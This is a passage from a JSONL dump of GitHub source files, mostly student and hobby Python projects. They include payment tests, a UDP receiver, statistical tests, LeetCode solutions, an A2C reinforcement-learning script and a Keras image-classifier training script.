settings.PAYMENT_GATEWAYS.keys())\ndef test_payment_gateway_templates_exists(gateway_name):\n \"\"\"Test if for each payment gateway there's a corresponding\n template for the old checkout.\n \"\"\"\n template = PAYMENT_TEMPLATE % gateway_name\n get_template(template)\n\n\n@pytest.mark.parametrize('gateway_name', settings.PAYMENT_GATEWAYS.keys())\ndef test_payment_gateway_form_exists(gateway_name, payment_dummy):\n \"\"\"Test if for each payment gateway there's a corresponding\n form for the old checkout.\n\n An error will be raised if it's missing.\n \"\"\"\n payment_gateway, gateway_params = get_payment_gateway(\n gateway_name)\n payment_gateway.get_form_class()\n\n\ndef test_clean_authorize():\n payment = Mock(can_authorize=Mock(return_value=True))\n clean_authorize(payment)\n\n payment = Mock(can_authorize=Mock(return_value=False))\n with pytest.raises(PaymentError):\n clean_authorize(payment)\n\n\ndef test_clean_capture():\n # Amount should be a positive number\n payment = Mock()\n amount = Decimal('0.00')\n with pytest.raises(PaymentError):\n clean_capture(payment, amount)\n\n # Payment cannot be captured\n payment = Mock(can_capture=Mock(return_value=False))\n amount = Decimal('1.00')\n with pytest.raises(PaymentError):\n clean_capture(payment, amount)\n\n # Amount is larger than payment's total\n payment = Mock(\n can_capture=Mock(return_value=True),\n total=Decimal('1.00'),\n captured_amount=Decimal('0.00'))\n amount = Decimal('2.00')\n with pytest.raises(PaymentError):\n clean_capture(payment, amount)\n\n amount = Decimal('2.00')\n payment = Mock(\n can_capture=Mock(return_value=True),\n total=amount,\n captured_amount=Decimal('0.00'))\n clean_capture(payment, amount)\n\n\ndef test_can_authorize(payment_dummy: Payment):\n assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED\n\n payment_dummy.is_active = False\n assert not payment_dummy.can_authorize()\n\n payment_dummy.is_active = True\n assert payment_dummy.can_authorize()\n\n payment_dummy.charge_status = ChargeStatus.CHARGED\n assert not payment_dummy.can_authorize()\n\n\ndef test_can_capture(payment_dummy: Payment):\n assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED\n\n payment_dummy.is_active = False\n assert not payment_dummy.can_capture()\n\n payment_dummy.is_active = True\n assert payment_dummy.can_capture()\n\n payment_dummy.charge_status = ChargeStatus.CHARGED\n assert payment_dummy.can_capture()\n\n payment_dummy.captured_amount = payment_dummy.total\n assert not payment_dummy.can_capture()\n\n\ndef test_can_charge(payment_dummy: Payment):\n assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED\n\n payment_dummy.is_active = False\n assert not payment_dummy.can_charge()\n\n payment_dummy.is_active = True\n assert payment_dummy.can_charge()\n\n payment_dummy.charge_status = ChargeStatus.CHARGED\n assert payment_dummy.can_charge()\n\n payment_dummy.captured_amount = payment_dummy.total\n assert not payment_dummy.can_charge()\n\n\ndef test_can_void(payment_dummy: Payment):\n assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED\n\n payment_dummy.is_active = False\n assert not payment_dummy.can_void()\n\n payment_dummy.is_active = True\n assert payment_dummy.can_void()\n\n payment_dummy.charge_status = ChargeStatus.CHARGED\n assert not payment_dummy.can_void()\n\n\ndef test_can_refund(payment_dummy: Payment):\n assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED\n\n payment_dummy.is_active = False\n assert not payment_dummy.can_refund()\n\n payment_dummy.is_active = True\n assert not payment_dummy.can_refund()\n\n payment_dummy.charge_status = ChargeStatus.CHARGED\n assert payment_dummy.can_refund()\n\n\ndef test_payment_get_authorized_amount(payment_txn_preauth):\n authorized_amount = payment_txn_preauth.transactions.first().amount\n assert payment_txn_preauth.get_authorized_amount().amount == \\\n authorized_amount\n assert payment_txn_preauth.order.total_authorized.amount == \\\n authorized_amount\n\n\n payment_txn_preauth.transactions.all().delete()\n assert payment_txn_preauth.get_authorized_amount().amount == Decimal(0)\n","repo_name":"Kenstogram/opensale","sub_path":"tests/test_payment.py","file_name":"test_payment.py","file_ext":"py","file_size_in_byte":20118,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"74034398245","text":"import sys\nfrom socket import *\nimport zlib\n\ndef split_packet(packet):\n checksum = int.from_bytes(packet[:4], 'big')\n seq_ack = int.from_bytes(packet[4:5], 'big')\n data = packet[5:].decode()\n return checksum, seq_ack, data\n\ndef create_ack(seq_num):\n packet = seq_num.to_bytes(1, 'big')\n checksum = zlib.crc32(packet).to_bytes(4, 'big')\n packet = checksum + packet\n return packet\n\ndef check_packet(packet):\n expected_checksum = int.from_bytes(packet[:4], 'big')\n actual_checksum = zlib.crc32(packet[4:])\n return expected_checksum == actual_checksum\n\ndef Bob():\n\n serverPort = int(sys.argv[1])\n serverSocket = socket(AF_INET, SOCK_DGRAM)\n serverSocket.bind(('', serverPort))\n expected_seq_num = 0\n\n while True:\n # receive packet\n received_packet, clientAddress = serverSocket.recvfrom(64)\n \n # check if packet corrupted\n if check_packet(received_packet):\n checksum, seq_num, data = split_packet(received_packet)\n \n #check if seq num matches expected seq num\n if seq_num == expected_seq_num:\n print(data, end = \"\")\n expected_seq_num = 1 - seq_num\n \n # send out ack_packet\n ack_packet = create_ack(seq_num)\n serverSocket.sendto(ack_packet, clientAddress)\n\n serverSocket.close()\n\nif __name__ == \"__main__\":\n Bob()\n","repo_name":"bryanongjx/CS2105-Assignments","sub_path":"Assignment2/Bob.py","file_name":"Bob.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11659440537","text":"import math\nfrom abc import ABC, abstractmethod\nfrom statistics import mean\n\n\nclass EqualityMeansAndVarianceTwoSamples(ABC):\n def __init__(self, data_x: list[float], data_y: list[float], t_a: float = 2.0, f_a: float = 1.53):\n self.data_x: list[float] = data_x\n self.data_y: list[float] = data_y\n\n self.t_a: float = t_a # квантиль розподілу Стьюдента\n self.f_a: float = f_a # квантиль розподілу Фішера\n\n self.x_average: float | None = None\n self.y_average: float | None = None\n\n self.S2__x: float | None = None\n self.S2__y: float | None = None\n\n self.t: float | None = None\n self.f: float | None = None\n\n self.calculation()\n\n @abstractmethod\n def calculate_t(self) -> float:\n pass\n\n @abstractmethod\n def calculate_f(self) -> float:\n pass\n\n def calculation(self):\n self.x_average = mean(self.data_x)\n self.y_average = mean(self.data_y)\n\n self.S2__x = self.get_variance(self.data_x, self.x_average)\n self.S2__y = self.get_variance(self.data_y, self.y_average)\n\n self.t = self.calculate_t()\n self.f = self.calculate_f()\n\n @staticmethod\n def sum_div(data: list[float], average: float, degree: int) -> float:\n return sum(math.pow(i - average, degree) for i in data)\n\n def get_variance(self, data: list[float], average: float, degree: int = 2, shifted: bool = True) -> float:\n return self.sum_div(data, average, degree) / (len(data) - (0 if shifted else 1))\n\n def get_result(self) -> str:\n result = \"\"\n if abs(self.t) <= self.t_a:\n result += \"Гіпотеза про рівність середніх значень сукупностей справджена!\\n\"\n else:\n result += \"Середні значення істотно відрізняються\\n\"\n\n if self.f <= self.f_a:\n result += \"Дисперсії генеральних сукупностей збігаються!\\n\"\n else:\n result += \"Дисперсії генеральних сукупностей відмінні!\\n\"\n\n return result\n\n\nclass DependentEqualityMeansAndVarianceTwoSamples(EqualityMeansAndVarianceTwoSamples):\n \"\"\"Перевірка рівностей середніх та дисперсії у випадку двох ЗАЛЕЖНИХ вибірок.\"\"\"\n\n def __init__(self, data_x: list[float], data_y: list[float], t_a: float = 2.0, f_a: float = 1.53):\n self.data_z: list[float] = [x - y for x, y in zip(data_x, data_y)]\n\n self.N: int = len(self.data_z)\n self.z_average: float | None = None\n self.S__z: float | None = None\n\n super().__init__(data_x, data_y, t_a, f_a)\n\n def calculation(self):\n self.z_average = mean(self.data_z)\n self.S__z = math.pow(\n self.get_variance(self.data_z, self.z_average),\n 1 / 2\n )\n super().calculation()\n\n def calculate_t(self) -> float:\n return (self.z_average * math.pow(self.N, 1 / 2)) / self.S__z\n\n def calculate_f(self) -> float:\n return self.S2__x / self.S2__y if self.S2__x >= self.S2__y else self.S2__y / self.S2__x\n\n def __str__(self):\n return f\"\"\"Перевірка рівностей середніх та дисперсії у випадку двох ЗАЛЕЖНИХ вибірок: t={self.t}, f={self.f}\"\"\"\n\n\nclass IndependentEqualityMeansAndVarianceTwoSamples(EqualityMeansAndVarianceTwoSamples):\n \"\"\"Перевірка рівностей середніх та дисперсії у випадку двох НЕЗАЛЕЖНИХ вибірок.\"\"\"\n\n def __init__(self, data_x: list[float], data_y: list[float], t_a: float = 2.0, f_a: float = 1.53):\n self.N_x: int = len(data_x)\n self.N_y: int = len(data_y)\n\n super().__init__(data_x, data_y, t_a, f_a)\n\n def calculate_t(self) -> float:\n s = ((self.N_x - 1) * self.S2__x + (self.N_y - 1) * self.S2__y) / self.N_x + self.N_y - 2\n return (self.x_average - self.y_average) / math.pow((s / self.N_x) + (s / self.N_y), 1 / 2)\n\n def calculate_f(self) -> float:\n return self.S2__x / self.S2__y if self.S2__x >= self.S2__y else self.S2__y / self.S2__x\n\n def __str__(self):\n return f\"\"\"Перевірка рівностей середніх та дисперсії у випадку двох НЕЗАЛЕЖНИХ вибірок: t={self.t}, f={self.f}\"\"\"\n\n\nif __name__ == '__main__':\n from data import (\n DATA_DEP_4_7_1, DATA_DEP_4_7_2,\n DATA_INDEP_4_7_1, DATA_INDEP_4_7_2\n )\n\n d = DependentEqualityMeansAndVarianceTwoSamples(DATA_DEP_4_7_1, DATA_DEP_4_7_2)\n print(d)\n print(d.get_result())\n print('-' * 100)\n i = IndependentEqualityMeansAndVarianceTwoSamples(DATA_INDEP_4_7_1, DATA_INDEP_4_7_2)\n print(i)\n print(i.get_result())","repo_name":"Grayder0152/Univer","sub_path":"analize/pr_4_5.py","file_name":"pr_4_5.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12334600948","text":"import unittest\nfrom async_url import fetch_url\nfrom unittest.mock import AsyncMock\n\n\nclass TestAsyncURLs(unittest.IsolatedAsyncioTestCase):\n async def test_fetch_url(self):\n my_mock = AsyncMock()\n my_mock.return_value = \"Abcd Efgh\"\n r = my_mock()\n awaited_result = await r\n res = len(awaited_result)\n self.assertEqual(res, len(await my_mock()))\n\n async def test_fetch_url_mock_generator(self):\n expected_values = [\"12345\", \"some string\", \"7*7=49\"]\n my_mock_generator = AsyncMock()\n my_mock_generator.__aiter__.return_value = expected_values\n\n actual_values = []\n async for value in my_mock_generator:\n actual_values.append(len(value))\n expected_values_len = [len(i) for i in expected_values]\n self.assertListEqual(expected_values_len, actual_values)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"maikdonut/made_python_course","sub_path":"advance_06/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29971214727","text":"import datetime\n\nfrom .device_infos import DeviceInfos\n\n\n# --------------------------------------------------------------------------------\nclass MidPointTemp:\n @staticmethod\n def midpoint_temp_for_month(\n calculation_moment: datetime.datetime,\n device_mnfos: DeviceInfos,\n ) -> float:\n # Magic numbers for polynomial using UK mid-point historic temps\n\n month = calculation_moment.month\n # Equation for Goole, United Kingdom: https://www.metoffice.gov.uk/research/climate/maps-and-data/uk-climate-averages/gcx4kb837\n return (0.0019 * month**5) + (-0.04973 * month**4) + (0.37424 * month**3) - (0.64667 * month**2) + (0.43078 * month) + 3.86\n","repo_name":"MyForest/heatpump-act","sub_path":"act/midpoint_temp.py","file_name":"midpoint_temp.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"3664676971","text":"\n\ndef draw_board(grid):\n board = (f\"|{grid[1]}|{grid[2]}|{grid[3]}|\\n\"\n f\"|{grid[4]}|{grid[5]}|{grid[6]}|\\n\"\n f\"|{grid[7]}|{grid[8]}|{grid[9]}|\")\n print(board)\n\ndef check_turn(turn):\n return 'O' if not (turn % 2) else 'X' \n\n\ndef check_for_win(grid):\n if (grid[1] == grid[2] == grid[3]) \\\n or (grid[4] == grid[5] == grid[6]) \\\n or (grid[7] == grid[8] == grid[9]):\n return True\n if (grid[1] == grid[4] == grid[7]) \\\n or (grid[2] == grid[5] == grid[8]) \\\n or (grid[3] == grid[6] == grid[9]):\n return True\n if (grid[1] == grid[5] == grid[9]) \\\n or (grid[3] == grid[5] == grid[7]):\n return True\n else: return False\n","repo_name":"SA-GutHub/python-tic-tac-toe","sub_path":"tic tac toe/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"38907260225","text":"import magic\nimport glob\nimport hashlib\nfilenames = glob.glob(\"Dokaz_4/*\")\nchallenge = \"c15e32d27635f248c1c8b66bb012850e5b342119\"\n\nfor filename in filenames:\n with open(filename, \"rb\") as inputfile:\n data = inputfile.read()\n if hashlib.sha1(data).hexdigest() == challenge:\n print(filename, magic.from_file(filename))\n break\n\n","repo_name":"aradacic/forenzika","sub_path":"lab2/lab24.py","file_name":"lab24.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70274669285","text":"# A2C\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport time\nimport gym\n\ngamma = 0.95\nlr = 0.001\nhidden_state = 20\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(\"using device: \", device)\n\n\ndef weight_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv2d') != -1:\n torch.nn.init.normal_(m.weight.data, 0, 0.1)\n torch.nn.init.constant_(m.bias.data, 0.0)\n elif classname.find('Linear') != -1:\n torch.nn.init.normal_(m.weight)\n torch.nn.init.constant_(m.bias, 0.0)\n elif classname.find('BatchNorm2d') != -1:\n torch.nn.init.normal_(m.weight.data, 1.0, 0.02)\n torch.nn.init.constant_(m.bias.data, 0.0)\n\n\nclass MLP(nn.Module):\n def __init__(self, state_dim, action_state):\n super(MLP, self).__init__()\n self.fc1 = nn.Linear(state_dim, hidden_state)\n self.fc2 = nn.Linear(hidden_state, action_state)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.relu(x)\n x = self.fc2(x)\n return x\n\n\nclass Actor(object):\n def __init__(self, env):\n self.state_dim = env.observation_space.shape[0]\n self.action_dim = env.action_space.n\n\n self.network = MLP(self.state_dim, self.action_dim)\n self.optimizer = torch.optim.SGD(self.network.parameters(), lr=lr)\n\n self.time_step = 0\n\n def choose_action(self, observation):\n observation = torch.FloatTensor(observation).to(device)\n network_output = self.network.forward(observation) # [action_dim, ]\n with torch.no_grad():\n prob_weights = F.softmax(network_output, dim=0).data.cpu().numpy()\n action = np.random.choice(range(prob_weights.shape[0]), p=prob_weights)\n return action\n\n def learn(self, state, action, td_error):\n self.time_step += 1\n # forward\n softmax_input = self.network.forward(torch.FloatTensor(state).to(device)).unsqueeze(0)\n action = torch.LongTensor([action]).to(device)\n neg_log_prob = F.cross_entropy(input=softmax_input, target=action, reduction=\"none\")\n # backward\n loss = -neg_log_prob * td_error\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n\nEplison = 0.01\nEpisode = 1000\nSteps = 300\nReplay_szie = 10000\nTests = 10\nBatch_size = 32\nReplay_target_freq = 10 # frequency to update target Q network\ngame = 'CartPole-v0'\n\n\nclass Critic(nn.Module):\n def __init__(self, env):\n super(Critic, self).__init__()\n self.state_dim = env.observation_space.shape[0]\n self.action_dim = 1\n\n self.network = MLP(self.state_dim, self.action_dim).to(device)\n self.optimizer = torch.optim.SGD(self.network.parameters(), lr=lr)\n self.criterion = nn.MSELoss()\n\n self.time_step = 0\n self.epsilon = Eplison\n\n def train_Q_network(self, state, reward, next_state):\n s, s_ = torch.FloatTensor(state).to(device), torch.FloatTensor(next_state).to(device)\n\n # forward\n v = self.network.forward(s)\n v_ = self.network.forward(s_)\n\n # backward\n loss = self.criterion(reward + gamma * v_, v)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n with torch.no_grad():\n td_error = reward + gamma * v_ - v\n return td_error\n\n\ndef train():\n env = gym.make(game)\n actor = Actor(env)\n critic = Critic(env)\n\n for episode in range(Episode):\n state = env.reset()\n for step in range(Steps):\n action = actor.choose_action(state)\n next_state, reward, done, _ = env.step(action)\n td_error = critic.train_Q_network(state, reward, next_state)\n actor.learn(state, action, td_error)\n state = next_state\n if done:\n break\n\n if episode % 100 == 0:\n total_reward = 0\n for i in range(Tests):\n state = env.reset()\n for j in range(Steps):\n action = actor.choose_action(state)\n state, reward, done, _ = env.step(action)\n total_reward += reward\n if done:\n break\n avg_reward = total_reward / Tests\n print(\"Episode:{}, Average Reward:{}\".format(episode, avg_reward))\n\n\nif __name__ == \"__main__\":\n train()\n","repo_name":"JackeyLove1/Leetcode","sub_path":"python/ML/RL/A2C.py","file_name":"A2C.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"41778662886","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 1 18:31:40 2023\r\n\r\n@author: Amalu Vincent\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# Read data from file and store in array\r\ndata = np.loadtxt('data4.csv')\r\nfig = plt.figure(figsize=(8,5))\r\n# Create histogram of newborn weights\r\nn, bins, patches = plt.hist(data, bins=20,color='coral', edgecolor='white',alpha=0.7)\r\n# Calculate average weight\r\nW_mean = np.mean(data)\r\n# Calculate fraction of babies born with weight between 0.9W and 1.1W\r\nW_09 = 0.9 * W_mean\r\nW_11 = 1.1 * W_mean\r\nn_09_11 = sum((W_09 <= data) & (data <= W_11)) / len(data)\r\n\r\n# Plot X and W values on histogram\r\nplt.axvline(x=W_mean, color='black',linestyle='--', label='Average weight')\r\nplt.axvspan(W_09, W_11, alpha=0.3, color='g', label='0.9W to 1.1W')\r\nplt.legend()\r\nplt.xlabel('Newborn weight (kg)',fontweight='bold')\r\nplt.ylabel('Frequency', fontweight='bold')\r\nplt.title('Distribution Of Newborn Weights', fontweight='bold')\r\n\r\n\r\n# Print values on graph\r\nplt.text(0.05, 0.9, f'Average weight(W~)= {W_mean:.2f} kg\\n', \r\n transform=plt.gca().transAxes)\r\nplt.text(0.05, 0.8, f'Fraction of babies between \\n 0.9W and 1.1W (X)={n_09_11:.2%}',\r\n transform=plt.gca().transAxes)\r\nplt.savefig('histogram.png')\r\nplt.show()\r\n","repo_name":"amaluvincent/coding-project","sub_path":"22026244.py.py","file_name":"22026244.py.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17878567115","text":"import re\nfrom bs4 import BeautifulSoup\n\nhtml = \"\"\"\n\n\"\"\"\nsoup = BeautifulSoup(html, 'lxml')\n# text参数可用来匹配节点的文本,传入的形式可以是字符串,可以是正则表达式对象\nprint(soup.find_all(text=re.compile('link')))","repo_name":"JasonSam1996/Python3CrawlerDemo","sub_path":"4_2/soup11.py","file_name":"soup11.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28160185499","text":"# -*- coding: utf-8 -*-\ndef canJump(nums: list) -> bool:\n bound = len(nums) - 1\n \n for i in range(len(nums)-2, -1, -1):\n if nums[i] >= bound - i:\n bound = i\n \n return bound == 0\n\n\n\nif __name__ == \"__main__\":\n nums = [2, 3, 1, 1, 4]\n nums = [3, 2, 1, 0, 4]\n","repo_name":"Lukaschen1986/LeetCodeProgress","sub_path":"dp/55_canJump.py","file_name":"55_canJump.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27331603627","text":"# quart_hosted.py\nfrom quart import Quart\n\napp = Quart(__name__)\n\n\n@app.route(\"/api\")\nasync def my_get_handler():\n return {\"Hello\": \"World!\"}\n\n\n@app.route(\"/api_post\", methods=[\"POST\"])\nasync def my_post_handler():\n return \"ok\", 200\n\n\nif __name__ == \"__main__\":\n app.run(host=\"REPLACE WITH YOUR IP ADDRESS\")\n","repo_name":"PacktPublishing/Python-Microservices-Development-2nd-Edition","sub_path":"CodeSamples/Chapter5/quart_hosted.py","file_name":"quart_hosted.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"52"} +{"seq_id":"6131600825","text":"import sys\n\n###################################################################################\n# Takes a txt file from the apply grad dump for a program (such as MIIS, MCDS,\n# ans MSAII) and creates a csv, which can be loaded by pandas. Renames\n# duplicate column names with \"_N\" so that each column has a unique name.\n###################################################################################\ndef format_csv(input_file):\n output_file_name = input_file.split('.')[0] + '.csv'\n output_file = open(output_file_name, 'w', encoding=\"utf-8\", errors='ignore')\n is_header = True\n header_list = []\n header_duplicate_dict = {}\n linenum = 1\n with open(input_file, 'r', encoding='utf-8') as f:\n for line in f:\n line = line.replace('\"', '')\n linenum += 1\n line_parts = line.split('^')\n if is_header:\n for header_name in line_parts:\n if header_name in header_list:\n header_duplicate_dict[header_name] = header_duplicate_dict.get(header_name, 1) + 1\n header_name = header_name + '_' + str(header_duplicate_dict[header_name])\n header_list.append(header_name)\n new_string = ','.join(map(lambda x: \"\\\"\" + x.strip() + \"\\\"\", header_list))\n is_header = False\n else:\n new_string = ','.join(map(lambda x: \"\\\"\" + x.strip() + \"\\\"\", line_parts))\n #print(new_string)\n output_file.write(new_string)\n output_file.write('\\n')\n output_file.flush()\n output_file.close()\n\nif __name__ == '__main__':\n input_file = sys.argv[1]\n format_csv(input_file)","repo_name":"CMU-Language-Technologies-Institute/LTIAdmissions","sub_path":"format_applygrad_csv.py","file_name":"format_applygrad_csv.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37217563631","text":"#\n# @lc app=leetcode id=113 lang=python3\n#\n# [113] Path Sum II\n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n# method 1\n# 异常情况返回一维列表,循环中会被忽略,正常情况返回二维列表,会自动添加\n# class Solution:\n# def pathSum(self, root: TreeNode, sum: int) -> List[List[int]]:\n# if not root:\n# return []\n# if (not root.left and not root.right) and (root.val==sum):\n# return [[root.val]]\n# if not root.left and not root.right:\n# return []\n# res = []\n# for val in self.pathSum(root.left, sum-root.val):\n# res.append([root.val]+val)\n# for val in self.pathSum(root.right, sum-root.val):\n# res.append([root.val]+val)\n# return res\n# method 2 竟然用了 queue,广度优先遍历,用队列记录结点、路线和值,\n# 可以的,用一个三元组很轻松地解决了重复记录或者丢失信息的问题\nclass Solution:\n def pathSum(self, root: TreeNode, sum: int) -> List[List[int]]:\n if not root:\n return []\n res = []\n queue = [(root, root.val, [root.val])]\n while queue:\n cur, val, ls = queue.pop(0)\n if not cur.left and not cur.right and val==sum:\n res.append(ls)\n if cur.left:\n queue.append((cur.left, val+cur.left.val, ls+[cur.left.val]))\n if cur.right:\n queue.append((cur.right, val+cur.right.val, ls+[cur.right.val]))\n return res\n\n\n","repo_name":"TJJTJJTJJ/leetcode","sub_path":"113.path-sum-ii.py","file_name":"113.path-sum-ii.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26781700377","text":"from flask_sqlalchemy import SQLAlchemy\nfrom flask import Flask\nfrom flast_test.apps.database.postgres.connection import get_connection_str\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = get_connection_str()\ndb = SQLAlchemy(app)\n\n\nclass Products(db.Model):\n # __tablename__ = \"products\"\n\n asin = db.Column(\"asin\", db.String(60), primary_key=True, unique=True)\n title = db.Column(db.String(300))\n # review = db.relationship('ProductReview', backref='products')\n\n def __repr__(self):\n return f''\n\n\nclass ProductReview(db.Model):\n # __tablename__ = \"product_review\"\n\n id = db.Column('review_id', db.Integer, primary_key=True)\n asin = db.Column(db.String(60), db.ForeignKey(\"products.asin\"))\n title = db.Column(db.String(300))\n review = db.Column(db.String(10000))\n product = db.relationship(\"Products\", backref=\"productreview\")\n\n def __repr__(self):\n return f''\n\n\ndb.create_all()","repo_name":"Mrwhite113/flast_test","sub_path":"apps/database/postgres/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71982500646","text":"import os\nimport time\nfrom configparser import ConfigParser\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom keras.layers import Convolution2D, MaxPooling2D, Dense, Flatten, Dropout\nfrom keras.models import Sequential\nfrom keras.utils.np_utils import to_categorical\n\nfrom custom_callbacks import LogTraining\nfrom data_generator import data_generator, datagen_horizontal_flip\n\nK.set_image_dim_ordering('th')\n# Magic...\ntf.python.control_flow_ops = tf\n\nconfig = ConfigParser()\nconfig.read(\"config.ini\")\n\nAUGMENT_BRIGHTNESS = config.get(\"training\", \"augmentBrightness\")\nAUGMENT_SHADOWS = config.get(\"training\", \"augmentShadows\")\n\nDATA_FOLDER_PATH = \"./data\"\nTRAIN_X_PATH = os.path.join(DATA_FOLDER_PATH, \"X_train.npy\")\nTRAIN_Y_PATH = os.path.join(DATA_FOLDER_PATH, \"Y_train.npy\")\nTEST_X_PATH = os.path.join(DATA_FOLDER_PATH, \"X_test.npy\")\nTEST_Y_PATH = os.path.join(DATA_FOLDER_PATH, \"Y_test.npy\")\n\nSAVE_MODEL_FOLDER_PATH = \"./savedModel\"\nCHECKPOINT_FOLDER_PATH = os.path.join(SAVE_MODEL_FOLDER_PATH, \"trainCheckpoints\")\nVISUALIZATION_FOLDER_PATH = os.path.join(SAVE_MODEL_FOLDER_PATH, \"visualization\")\n\n# Train data\n# X: (n_samples, rows, cols)\n# Y: (n_samples, n_category)\nX_train = np.load(TRAIN_X_PATH).astype(np.uint8)\n# Load and one-hot-encode the labels\ny_train = to_categorical(np.load(TRAIN_Y_PATH).astype(np.uint8))\n\nprint(\"X shape: {0}\\nY shape: {1}\".format(X_train.shape, y_train.shape))\n\n# original shape: (rows, cols)\nimage_shape = (X_train.shape[1], X_train.shape[2])\n# train data shape: (1, rows, cols)\ntrain_image_shape = (1,) + image_shape\n\nprint(\"Image shape: {0}\".format(image_shape))\nprint(\"Train image shape: {0}\".format(train_image_shape))\nprint(\"Output layer dim: {0}\".format(y_train.shape[1]))\n\nbatch_size = 64\nsamples_per_epoch = 20480\nnb_epoch = 10\n\nmodel = Sequential()\nmodel.add(Convolution2D(32, 3, 3, border_mode='same', activation='elu', input_shape=train_image_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(32, 3, 3, border_mode='same', activation='elu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(64, 3, 3, border_mode='same', activation='elu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(128, 3, 3, border_mode='same', activation='elu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(1024, activation='elu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(512, activation='elu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(y_train.shape[1], activation='softmax'))\n\n# Uncomment this if you would like to continue a training from a checkpoint:\n\n# existing_model_weights_path = os.path.join(SAVE_MODEL_FOLDER_PATH, \"model_weights_10_epochs.h5\")\n# if os.path.exists(existing_model_weights_path):\n# print(\"Loading weights...\")\n# model.load_weights(existing_model_weights_path)\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\ncheckpoint = ModelCheckpoint(os.path.join(CHECKPOINT_FOLDER_PATH, \"weights-{epoch:02d}-{loss:.2f}-{acc:.2f}.hdf5\"),\n monitor=\"loss\",\n save_best_only=True,\n save_weights_only=True)\nlog_training = LogTraining(os.path.join(VISUALIZATION_FOLDER_PATH, \"training_log_{0}_epochs.txt\".format(nb_epoch)))\ntensorboard = TensorBoard(log_dir=os.path.join(SAVE_MODEL_FOLDER_PATH, \"tensorboard_logs\"), histogram_freq=0,\n write_graph=False, write_images=True)\ncallbacks = [checkpoint, log_training, tensorboard]\n\nstartTime = time.clock()\nhist = model.fit_generator(\n data_generator(batch_size, X_train, y_train, image_data_generator=datagen_horizontal_flip, augment_brightness=AUGMENT_BRIGHTNESS,\n augment_shadows=AUGMENT_SHADOWS),\n samples_per_epoch=samples_per_epoch, nb_epoch=nb_epoch,\n verbose=1,\n callbacks=callbacks)\nendTime = time.clock()\n\nprint(\"Model is trained in {0} seconds!\".format(endTime - startTime))\n\n# Saving the trained model\n\nprint(\"Saving model...\")\nmodelJson = model.to_json()\nwith open(os.path.join(SAVE_MODEL_FOLDER_PATH, \"model_structure.json\"), \"w\") as json_file:\n json_file.write(modelJson)\nmodel.save_weights(os.path.join(SAVE_MODEL_FOLDER_PATH, \"model_weights_{0}_epochs.h5\".format(nb_epoch)))\nmodel.save(os.path.join(SAVE_MODEL_FOLDER_PATH, 